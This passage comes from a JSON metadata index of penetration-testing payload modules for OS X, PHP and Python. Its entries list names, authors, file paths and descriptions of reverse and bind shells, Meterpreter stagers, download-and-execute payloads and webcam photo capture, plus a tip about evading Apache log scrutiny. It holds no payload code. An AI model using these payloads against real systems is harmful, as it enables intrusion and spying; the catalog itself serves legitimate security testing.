"rank": 300,
"disclosure_date": null,
"type": "payload",
"author": [
"hdm <x@hdm.io>"
],
"description": "Listen for a connection and spawn a command shell",
"references": [
],
"platform": "OSX",
"arch": "ppc",
"rport": null,
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/payloads/singles/osx/ppc/shell_bind_tcp.rb",
"is_install_path": true,
"ref_name": "osx/ppc/shell_bind_tcp",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"payload_osx/ppc/shell_reverse_tcp": {
"name": "OS X Command Shell, Reverse TCP Inline",
"full_name": "payload/osx/ppc/shell_reverse_tcp",
"rank": 300,
"disclosure_date": null,
"type": "payload",
"author": [
"hdm <x@hdm.io>"
],
"description": "Connect back to attacker and spawn a command shell",
"references": [
],
"platform": "OSX",
"arch": "ppc",
"rport": null,
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/payloads/singles/osx/ppc/shell_reverse_tcp.rb",
"is_install_path": true,
"ref_name": "osx/ppc/shell_reverse_tcp",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"payload_osx/x64/dupandexecve/bind_tcp": {
"name": "OS X dup2 Command Shell, Bind TCP Stager",
"full_name": "payload/osx/x64/dupandexecve/bind_tcp",
"rank": 300,
"disclosure_date": null,
"type": "payload",
"author": [
"nemo",
"nemo <nemo@felinemenace.org>"
],
"description": "dup2 socket in edi, then execve. Listen, read length, read buffer, execute",
"references": [
],
"platform": "OSX",
"arch": "x64",
"rport": null,
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/payloads/stagers/osx/x64/bind_tcp.rb",
"is_install_path": true,
"ref_name": "osx/x64/dupandexecve/bind_tcp",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"payload_osx/x64/dupandexecve/reverse_tcp": {
"name": "OS X dup2 Command Shell, Reverse TCP Stager",
"full_name": "payload/osx/x64/dupandexecve/reverse_tcp",
"rank": 300,
"disclosure_date": null,
"type": "payload",
"author": [
"nemo",
"nemo <nemo@felinemenace.org>"
],
"description": "dup2 socket in edi, then execve. Connect, read length, read buffer, execute",
"references": [
],
"platform": "OSX",
"arch": "x64",
"rport": null,
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2018-01-10 15:06:08 +0000",
"path": "/modules/payloads/stagers/osx/x64/reverse_tcp.rb",
"is_install_path": true,
"ref_name": "osx/x64/dupandexecve/reverse_tcp",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"payload_osx/x64/exec": {
"name": "OS X x64 Execute Command",
"full_name": "payload/osx/x64/exec",
"rank": 300,
"disclosure_date": null,
"type": "payload",
"author": [
"argp <argp@census-labs.com>",
"joev <joev@metasploit.com>"
],
"description": "Execute an arbitrary command",
"references": [
],
"platform": "OSX",
"arch": "x64",
"rport": null,
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/payloads/singles/osx/x64/exec.rb",
"is_install_path": true,
"ref_name": "osx/x64/exec",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"payload_osx/x64/meterpreter/bind_tcp": {
"name": "OSX Meterpreter, Bind TCP Stager",
"full_name": "payload/osx/x64/meterpreter/bind_tcp",
"rank": 300,
"disclosure_date": null,
"type": "payload",
"author": [
"parchedmind",
"nologic",
"timwr",
"nemo <nemo@felinemenace.org>"
],
"description": "Inject the mettle server payload (staged). Listen, read length, read buffer, execute",
"references": [
"URL-https://github.com/CylanceVulnResearch/osx_runbin",
"URL-https://github.com/nologic/shellcc"
],
"platform": "OSX",
"arch": "x64",
"rport": null,
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/payloads/stagers/osx/x64/bind_tcp.rb",
"is_install_path": true,
"ref_name": "osx/x64/meterpreter/bind_tcp",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"payload_osx/x64/meterpreter/reverse_tcp": {
"name": "OSX Meterpreter, Reverse TCP Stager",
"full_name": "payload/osx/x64/meterpreter/reverse_tcp",
"rank": 300,
"disclosure_date": null,
"type": "payload",
"author": [
"parchedmind",
"nologic",
"timwr",
"nemo <nemo@felinemenace.org>"
],
"description": "Inject the mettle server payload (staged). Connect, read length, read buffer, execute",
"references": [
"URL-https://github.com/CylanceVulnResearch/osx_runbin",
"URL-https://github.com/nologic/shellcc"
],
"platform": "OSX",
"arch": "x64",
"rport": null,
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2018-01-10 15:06:08 +0000",
"path": "/modules/payloads/stagers/osx/x64/reverse_tcp.rb",
"is_install_path": true,
"ref_name": "osx/x64/meterpreter/reverse_tcp",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"payload_osx/x64/meterpreter_reverse_http": {
"name": "OSX Meterpreter, Reverse HTTP Inline",
"full_name": "payload/osx/x64/meterpreter_reverse_http",
"rank": 300,
"disclosure_date": null,
"type": "payload",
"author": [
"Adam Cammack <adam_cammack@rapid7.com>",
"Brent Cook <brent_cook@rapid7.com>",
"timwr"
],
"description": "Run the Meterpreter / Mettle server payload (stageless)",
"references": [
],
"platform": "OSX",
"arch": "x64",
"rport": null,
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2019-04-11 09:43:17 +0000",
"path": "/modules/payloads/singles/osx/x64/meterpreter_reverse_http.rb",
"is_install_path": true,
"ref_name": "osx/x64/meterpreter_reverse_http",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"payload_osx/x64/meterpreter_reverse_https": {
"name": "OSX Meterpreter, Reverse HTTPS Inline",
"full_name": "payload/osx/x64/meterpreter_reverse_https",
"rank": 300,
"disclosure_date": null,
"type": "payload",
"author": [
"Adam Cammack <adam_cammack@rapid7.com>",
"Brent Cook <brent_cook@rapid7.com>",
"timwr"
],
"description": "Run the Meterpreter / Mettle server payload (stageless)",
"references": [
],
"platform": "OSX",
"arch": "x64",
"rport": null,
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2019-04-11 09:43:17 +0000",
"path": "/modules/payloads/singles/osx/x64/meterpreter_reverse_https.rb",
"is_install_path": true,
"ref_name": "osx/x64/meterpreter_reverse_https",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"payload_osx/x64/meterpreter_reverse_tcp": {
"name": "OSX Meterpreter, Reverse TCP Inline",
"full_name": "payload/osx/x64/meterpreter_reverse_tcp",
"rank": 300,
"disclosure_date": null,
"type": "payload",
"author": [
"Adam Cammack <adam_cammack@rapid7.com>",
"Brent Cook <brent_cook@rapid7.com>",
"timwr"
],
"description": "Run the Meterpreter / Mettle server payload (stageless)",
"references": [
],
"platform": "OSX",
"arch": "x64",
"rport": null,
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2019-04-11 09:43:17 +0000",
"path": "/modules/payloads/singles/osx/x64/meterpreter_reverse_tcp.rb",
"is_install_path": true,
"ref_name": "osx/x64/meterpreter_reverse_tcp",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"payload_osx/x64/say": {
"name": "OS X x64 say Shellcode",
"full_name": "payload/osx/x64/say",
"rank": 300,
"disclosure_date": null,
"type": "payload",
"author": [
"nemo <nemo@felinemenace.org>"
],
"description": "Say an arbitrary string out loud using Mac OS X text2speech",
"references": [
],
"platform": "OSX",
"arch": "x64",
"rport": null,
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/payloads/singles/osx/x64/say.rb",
"is_install_path": true,
"ref_name": "osx/x64/say",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"payload_osx/x64/shell_bind_tcp": {
"name": "OS X x64 Shell Bind TCP",
"full_name": "payload/osx/x64/shell_bind_tcp",
"rank": 300,
"disclosure_date": null,
"type": "payload",
"author": [
"nemo <nemo@felinemenace.org>"
],
"description": "Bind an arbitrary command to an arbitrary port",
"references": [
],
"platform": "OSX",
"arch": "x64",
"rport": null,
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/payloads/singles/osx/x64/shell_bind_tcp.rb",
"is_install_path": true,
"ref_name": "osx/x64/shell_bind_tcp",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"payload_osx/x64/shell_find_tag": {
"name": "OSX Command Shell, Find Tag Inline",
"full_name": "payload/osx/x64/shell_find_tag",
"rank": 300,
"disclosure_date": null,
"type": "payload",
"author": [
"nemo <nemo@felinemenace.org>"
],
"description": "Spawn a shell on an established connection (proxy/nat safe)",
"references": [
],
"platform": "OSX",
"arch": "x64",
"rport": null,
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/payloads/singles/osx/x64/shell_find_tag.rb",
"is_install_path": true,
"ref_name": "osx/x64/shell_find_tag",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"payload_osx/x64/shell_reverse_tcp": {
"name": "OS X x64 Shell Reverse TCP",
"full_name": "payload/osx/x64/shell_reverse_tcp",
"rank": 300,
"disclosure_date": null,
"type": "payload",
"author": [
"nemo <nemo@felinemenace.org>"
],
"description": "Connect back to attacker and spawn a command shell",
"references": [
],
"platform": "OSX",
"arch": "x64",
"rport": null,
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/payloads/singles/osx/x64/shell_reverse_tcp.rb",
"is_install_path": true,
"ref_name": "osx/x64/shell_reverse_tcp",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"payload_osx/x86/bundleinject/bind_tcp": {
"name": "Mac OS X Inject Mach-O Bundle, Bind TCP Stager",
"full_name": "payload/osx/x86/bundleinject/bind_tcp",
"rank": 300,
"disclosure_date": null,
"type": "payload",
"author": [
"ddz <ddz@theta44.org>"
],
"description": "Inject a custom Mach-O bundle into the exploited process. Listen, read length, read buffer, execute",
"references": [
],
"platform": "OSX",
"arch": "x86",
"rport": null,
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/payloads/stagers/osx/x86/bind_tcp.rb",
"is_install_path": true,
"ref_name": "osx/x86/bundleinject/bind_tcp",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"payload_osx/x86/bundleinject/reverse_tcp": {
"name": "Mac OS X Inject Mach-O Bundle, Reverse TCP Stager",
"full_name": "payload/osx/x86/bundleinject/reverse_tcp",
"rank": 300,
"disclosure_date": null,
"type": "payload",
"author": [
"ddz <ddz@theta44.org>"
],
"description": "Inject a custom Mach-O bundle into the exploited process. Connect, read length, read buffer, execute",
"references": [
],
"platform": "OSX",
"arch": "x86",
"rport": null,
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/payloads/stagers/osx/x86/reverse_tcp.rb",
"is_install_path": true,
"ref_name": "osx/x86/bundleinject/reverse_tcp",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"payload_osx/x86/exec": {
"name": "OS X Execute Command",
"full_name": "payload/osx/x86/exec",
"rank": 300,
"disclosure_date": null,
"type": "payload",
"author": [
"snagg <snagg@openssl.it>",
"argp <argp@census-labs.com>",
"joev <joev@metasploit.com>"
],
"description": "Execute an arbitrary command",
"references": [
],
"platform": "OSX",
"arch": "x86",
"rport": null,
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/payloads/singles/osx/x86/exec.rb",
"is_install_path": true,
"ref_name": "osx/x86/exec",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"payload_osx/x86/isight/bind_tcp": {
"name": "Mac OS X x86 iSight Photo Capture, Bind TCP Stager",
"full_name": "payload/osx/x86/isight/bind_tcp",
"rank": 300,
"disclosure_date": null,
"type": "payload",
"author": [
"ddz <ddz@theta44.org>"
],
"description": "Inject a Mach-O bundle to capture a photo from the iSight (staged). Listen, read length, read buffer, execute",
"references": [
],
"platform": "OSX",
"arch": "x86",
"rport": null,
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/payloads/stagers/osx/x86/bind_tcp.rb",
"is_install_path": true,
"ref_name": "osx/x86/isight/bind_tcp",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"payload_osx/x86/isight/reverse_tcp": {
"name": "Mac OS X x86 iSight Photo Capture, Reverse TCP Stager",
"full_name": "payload/osx/x86/isight/reverse_tcp",
"rank": 300,
"disclosure_date": null,
"type": "payload",
"author": [
"ddz <ddz@theta44.org>"
],
"description": "Inject a Mach-O bundle to capture a photo from the iSight (staged). Connect, read length, read buffer, execute",
"references": [
],
"platform": "OSX",
"arch": "x86",
"rport": null,
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/payloads/stagers/osx/x86/reverse_tcp.rb",
"is_install_path": true,
"ref_name": "osx/x86/isight/reverse_tcp",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"payload_osx/x86/shell_bind_tcp": {
"name": "OS X Command Shell, Bind TCP Inline",
"full_name": "payload/osx/x86/shell_bind_tcp",
"rank": 300,
"disclosure_date": null,
"type": "payload",
"author": [
"Ramon de C Valle <rcvalle@metasploit.com>"
],
"description": "Listen for a connection and spawn a command shell",
"references": [
],
"platform": "OSX",
"arch": "x86",
"rport": null,
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2018-05-01 04:57:42 +0000",
"path": "/modules/payloads/singles/osx/x86/shell_bind_tcp.rb",
"is_install_path": true,
"ref_name": "osx/x86/shell_bind_tcp",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"payload_osx/x86/shell_find_port": {
"name": "OS X Command Shell, Find Port Inline",
"full_name": "payload/osx/x86/shell_find_port",
"rank": 300,
"disclosure_date": null,
"type": "payload",
"author": [
"Ramon de C Valle <rcvalle@metasploit.com>"
],
"description": "Spawn a shell on an established connection",
"references": [
],
"platform": "OSX",
"arch": "x86",
"rport": null,
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2018-05-01 04:57:42 +0000",
"path": "/modules/payloads/singles/osx/x86/shell_find_port.rb",
"is_install_path": true,
"ref_name": "osx/x86/shell_find_port",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"payload_osx/x86/shell_reverse_tcp": {
"name": "OS X Command Shell, Reverse TCP Inline",
"full_name": "payload/osx/x86/shell_reverse_tcp",
"rank": 300,
"disclosure_date": null,
"type": "payload",
"author": [
"Ramon de C Valle <rcvalle@metasploit.com>"
],
"description": "Connect back to attacker and spawn a command shell",
"references": [
],
"platform": "OSX",
"arch": "x86",
"rport": null,
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2018-05-01 04:57:42 +0000",
"path": "/modules/payloads/singles/osx/x86/shell_reverse_tcp.rb",
"is_install_path": true,
"ref_name": "osx/x86/shell_reverse_tcp",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"payload_osx/x86/vforkshell/bind_tcp": {
"name": "OS X (vfork) Command Shell, Bind TCP Stager",
"full_name": "payload/osx/x86/vforkshell/bind_tcp",
"rank": 300,
"disclosure_date": null,
"type": "payload",
"author": [
"ddz <ddz@theta44.org>"
],
"description": "Call vfork() if necessary and spawn a command shell (staged). Listen, read length, read buffer, execute",
"references": [
],
"platform": "OSX",
"arch": "x86",
"rport": null,
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/payloads/stagers/osx/x86/bind_tcp.rb",
"is_install_path": true,
"ref_name": "osx/x86/vforkshell/bind_tcp",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"payload_osx/x86/vforkshell/reverse_tcp": {
"name": "OS X (vfork) Command Shell, Reverse TCP Stager",
"full_name": "payload/osx/x86/vforkshell/reverse_tcp",
"rank": 300,
"disclosure_date": null,
"type": "payload",
"author": [
"ddz <ddz@theta44.org>"
],
"description": "Call vfork() if necessary and spawn a command shell (staged). Connect, read length, read buffer, execute",
"references": [
],
"platform": "OSX",
"arch": "x86",
"rport": null,
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/payloads/stagers/osx/x86/reverse_tcp.rb",
"is_install_path": true,
"ref_name": "osx/x86/vforkshell/reverse_tcp",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"payload_osx/x86/vforkshell_bind_tcp": {
"name": "OS X (vfork) Command Shell, Bind TCP Inline",
"full_name": "payload/osx/x86/vforkshell_bind_tcp",
"rank": 300,
"disclosure_date": null,
"type": "payload",
"author": [
"ddz <ddz@theta44.org>"
],
"description": "Listen for a connection, vfork if necessary, and spawn a command shell",
"references": [
],
"platform": "OSX",
"arch": "x86",
"rport": null,
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/payloads/singles/osx/x86/vforkshell_bind_tcp.rb",
"is_install_path": true,
"ref_name": "osx/x86/vforkshell_bind_tcp",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"payload_osx/x86/vforkshell_reverse_tcp": {
"name": "OS X (vfork) Command Shell, Reverse TCP Inline",
"full_name": "payload/osx/x86/vforkshell_reverse_tcp",
"rank": 300,
"disclosure_date": null,
"type": "payload",
"author": [
"ddz <ddz@theta44.org>"
],
"description": "Connect back to attacker, vfork if necessary, and spawn a command shell",
"references": [
],
"platform": "OSX",
"arch": "x86",
"rport": null,
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/payloads/singles/osx/x86/vforkshell_reverse_tcp.rb",
"is_install_path": true,
"ref_name": "osx/x86/vforkshell_reverse_tcp",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"payload_php/bind_perl": {
"name": "PHP Command Shell, Bind TCP (via Perl)",
"full_name": "payload/php/bind_perl",
"rank": 300,
"disclosure_date": null,
"type": "payload",
"author": [
"Samy <samy@samy.pl>",
"cazz <bmc@shmoo.com>"
],
"description": "Listen for a connection and spawn a command shell via perl (persistent)",
"references": [
],
"platform": "PHP",
"arch": "php",
"rport": null,
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/payloads/singles/php/bind_perl.rb",
"is_install_path": true,
"ref_name": "php/bind_perl",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"payload_php/bind_perl_ipv6": {
"name": "PHP Command Shell, Bind TCP (via perl) IPv6",
"full_name": "payload/php/bind_perl_ipv6",
"rank": 300,
"disclosure_date": null,
"type": "payload",
"author": [
"Samy <samy@samy.pl>",
"cazz <bmc@shmoo.com>"
],
"description": "Listen for a connection and spawn a command shell via perl (persistent) over IPv6",
"references": [
],
"platform": "PHP",
"arch": "php",
"rport": null,
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/payloads/singles/php/bind_perl_ipv6.rb",
"is_install_path": true,
"ref_name": "php/bind_perl_ipv6",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"payload_php/bind_php": {
"name": "PHP Command Shell, Bind TCP (via PHP)",
"full_name": "payload/php/bind_php",
"rank": 300,
"disclosure_date": null,
"type": "payload",
"author": [
"egypt <egypt@metasploit.com>",
"diaul <diaul@devilopers.org>"
],
"description": "Listen for a connection and spawn a command shell via php",
"references": [
],
"platform": "PHP",
"arch": "php",
"rport": null,
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/payloads/singles/php/bind_php.rb",
"is_install_path": true,
"ref_name": "php/bind_php",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"payload_php/bind_php_ipv6": {
"name": "PHP Command Shell, Bind TCP (via php) IPv6",
"full_name": "payload/php/bind_php_ipv6",
"rank": 300,
"disclosure_date": null,
"type": "payload",
"author": [
"egypt <egypt@metasploit.com>",
"diaul <diaul@devilopers.org>"
],
"description": "Listen for a connection and spawn a command shell via php (IPv6)",
"references": [
],
"platform": "PHP",
"arch": "php",
"rport": null,
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/payloads/singles/php/bind_php_ipv6.rb",
"is_install_path": true,
"ref_name": "php/bind_php_ipv6",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"payload_php/download_exec": {
"name": "PHP Executable Download and Execute",
"full_name": "payload/php/download_exec",
"rank": 300,
"disclosure_date": null,
"type": "payload",
"author": [
"egypt <egypt@metasploit.com>"
],
"description": "Download an EXE from an HTTP URL and execute it",
"references": [
],
"platform": "PHP",
"arch": "php",
"rport": null,
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/payloads/singles/php/download_exec.rb",
"is_install_path": true,
"ref_name": "php/download_exec",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"payload_php/exec": {
"name": "PHP Execute Command",
"full_name": "payload/php/exec",
"rank": 300,
"disclosure_date": null,
"type": "payload",
"author": [
"egypt <egypt@metasploit.com>"
],
"description": "Execute a single system command",
"references": [
],
"platform": "PHP",
"arch": "php",
"rport": null,
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2018-11-21 11:09:13 +0000",
"path": "/modules/payloads/singles/php/exec.rb",
"is_install_path": true,
"ref_name": "php/exec",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"payload_php/meterpreter/bind_tcp": {
"name": "PHP Meterpreter, Bind TCP Stager",
"full_name": "payload/php/meterpreter/bind_tcp",
"rank": 300,
"disclosure_date": null,
"type": "payload",
"author": [
"egypt <egypt@metasploit.com>"
],
"description": "Run a meterpreter server in PHP. Listen for a connection",
"references": [
],
"platform": "PHP",
"arch": "php",
"rport": null,
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2017-09-12 19:23:31 +0000",
"path": "/modules/payloads/stagers/php/bind_tcp.rb",
"is_install_path": true,
"ref_name": "php/meterpreter/bind_tcp",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"payload_php/meterpreter/bind_tcp_ipv6": {
"name": "PHP Meterpreter, Bind TCP Stager IPv6",
"full_name": "payload/php/meterpreter/bind_tcp_ipv6",
"rank": 300,
"disclosure_date": null,
"type": "payload",
"author": [
"egypt <egypt@metasploit.com>"
],
"description": "Run a meterpreter server in PHP. Listen for a connection over IPv6",
"references": [
],
"platform": "PHP",
"arch": "php",
"rport": null,
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2017-09-12 19:23:31 +0000",
"path": "/modules/payloads/stagers/php/bind_tcp_ipv6.rb",
"is_install_path": true,
"ref_name": "php/meterpreter/bind_tcp_ipv6",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"payload_php/meterpreter/bind_tcp_ipv6_uuid": {
"name": "PHP Meterpreter, Bind TCP Stager IPv6 with UUID Support",
"full_name": "payload/php/meterpreter/bind_tcp_ipv6_uuid",
"rank": 300,
"disclosure_date": null,
"type": "payload",
"author": [
"egypt <egypt@metasploit.com>",
"OJ Reeves"
],
"description": "Run a meterpreter server in PHP. Listen for a connection over IPv6 with UUID Support",
"references": [
],
"platform": "PHP",
"arch": "php",
"rport": null,
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2017-09-12 19:23:31 +0000",
"path": "/modules/payloads/stagers/php/bind_tcp_ipv6_uuid.rb",
"is_install_path": true,
"ref_name": "php/meterpreter/bind_tcp_ipv6_uuid",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"payload_php/meterpreter/bind_tcp_uuid": {
"name": "PHP Meterpreter, Bind TCP Stager with UUID Support",
"full_name": "payload/php/meterpreter/bind_tcp_uuid",
"rank": 300,
"disclosure_date": null,
"type": "payload",
"author": [
"egypt <egypt@metasploit.com>",
"OJ Reeves"
],
"description": "Run a meterpreter server in PHP. Listen for a connection with UUID Support",
"references": [
],
"platform": "PHP",
"arch": "php",
"rport": null,
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2017-09-12 19:23:31 +0000",
"path": "/modules/payloads/stagers/php/bind_tcp_uuid.rb",
"is_install_path": true,
"ref_name": "php/meterpreter/bind_tcp_uuid",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"payload_php/meterpreter/reverse_tcp": {
"name": "PHP Meterpreter, PHP Reverse TCP Stager",
"full_name": "payload/php/meterpreter/reverse_tcp",
"rank": 300,
"disclosure_date": null,
"type": "payload",
"author": [
"egypt <egypt@metasploit.com>"
],
"description": "Run a meterpreter server in PHP. Reverse PHP connect back stager with checks for disabled functions",
"references": [
],
"platform": "PHP",
"arch": "php",
"rport": null,
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2017-09-12 19:23:31 +0000",
"path": "/modules/payloads/stagers/php/reverse_tcp.rb",
"is_install_path": true,
"ref_name": "php/meterpreter/reverse_tcp",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"payload_php/meterpreter/reverse_tcp_uuid": {
"name": "PHP Meterpreter, PHP Reverse TCP Stager",
"full_name": "payload/php/meterpreter/reverse_tcp_uuid",
"rank": 300,
"disclosure_date": null,
"type": "payload",
"author": [
"egypt <egypt@metasploit.com>",
"OJ Reeves"
],
"description": "Run a meterpreter server in PHP. Reverse PHP connect back stager with checks for disabled functions",
"references": [
],
"platform": "PHP",
"arch": "php",
"rport": null,
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2017-09-12 19:23:31 +0000",
"path": "/modules/payloads/stagers/php/reverse_tcp_uuid.rb",
"is_install_path": true,
"ref_name": "php/meterpreter/reverse_tcp_uuid",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"payload_php/meterpreter_reverse_tcp": {
"name": "PHP Meterpreter, Reverse TCP Inline",
"full_name": "payload/php/meterpreter_reverse_tcp",
"rank": 300,
"disclosure_date": null,
"type": "payload",
"author": [
"egypt <egypt@metasploit.com>"
],
"description": "Connect back to attacker and spawn a Meterpreter server (PHP)",
"references": [
],
"platform": "PHP",
"arch": "php",
"rport": null,
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2018-10-22 18:20:45 +0000",
"path": "/modules/payloads/singles/php/meterpreter_reverse_tcp.rb",
"is_install_path": true,
"ref_name": "php/meterpreter_reverse_tcp",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"payload_php/reverse_perl": {
"name": "PHP Command, Double Reverse TCP Connection (via Perl)",
"full_name": "payload/php/reverse_perl",
"rank": 300,
"disclosure_date": null,
"type": "payload",
"author": [
"cazz <bmc@shmoo.com>"
],
"description": "Creates an interactive shell via perl",
"references": [
],
"platform": "PHP",
"arch": "php",
"rport": null,
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/payloads/singles/php/reverse_perl.rb",
"is_install_path": true,
"ref_name": "php/reverse_perl",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"payload_php/reverse_php": {
"name": "PHP Command Shell, Reverse TCP (via PHP)",
"full_name": "payload/php/reverse_php",
"rank": 300,
"disclosure_date": null,
"type": "payload",
"author": [
"egypt <egypt@metasploit.com>"
],
"description": "Reverse PHP connect back shell with checks for disabled functions",
"references": [
],
"platform": "PHP",
"arch": "php",
"rport": null,
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/payloads/singles/php/reverse_php.rb",
"is_install_path": true,
"ref_name": "php/reverse_php",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"payload_php/shell_findsock": {
"name": "PHP Command Shell, Find Sock",
"full_name": "payload/php/shell_findsock",
"rank": 300,
"disclosure_date": null,
"type": "payload",
"author": [
"egypt <egypt@metasploit.com>"
],
"description": "Spawn a shell on the established connection to\n the webserver. Unfortunately, this payload\n can leave conspicuous evil-looking entries in the\n apache error logs, so it is probably a good idea\n to use a bind or reverse shell unless firewalls\n prevent them from working. The issue this\n payload takes advantage of (CLOEXEC flag not set\n on sockets) appears to have been patched on the\n Ubuntu version of Apache and may not work on\n other Debian-based distributions. Only tested on\n Apache but it might work on other web servers\n that leak file descriptors to child processes.",
"references": [
],
"platform": "PHP",
"arch": "php",
"rport": null,
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/payloads/singles/php/shell_findsock.rb",
"is_install_path": true,
"ref_name": "php/shell_findsock",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"payload_python/meterpreter/bind_tcp": {
"name": "Python Meterpreter, Python Bind TCP Stager",
"full_name": "payload/python/meterpreter/bind_tcp",
"rank": 300,
